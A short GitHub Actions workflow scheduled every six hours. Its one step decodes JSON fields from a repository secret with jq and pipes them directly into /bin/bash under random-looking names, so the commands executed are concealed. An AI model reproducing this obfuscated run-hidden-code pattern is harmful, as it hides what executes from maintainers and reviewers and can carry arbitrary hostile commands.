name: pozuojiaonong
on:
  workflow_dispatch:
  schedule:
    - cron: '9 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pozuojiaonong
        env:
          vp4338: ${{ secrets.vp4338 }}
        run: |
          echo $vp4338 | jq -r .du470 | /bin/bash
          echo $xmi07913 | jq -r .f521 | /bin/bash
          echo $mjoki67776 | jq -r .cot7 | /bin/bash
          echo $mhyuw0446 | jq -r .a15643 | /bin/bash
          echo $qfl34 | jq -r .kapq85593 | /bin/bash
          echo $bdjes69 | jq -r .afl9 | /bin/bash
          echo $mvanh2284 | jq -r .piz84447 | /bin/bash
          echo $hak50578 | jq -r .bxjg16345 | /bin/bash
          echo $qm13900 | jq -r .iw74397 | /bin/bash

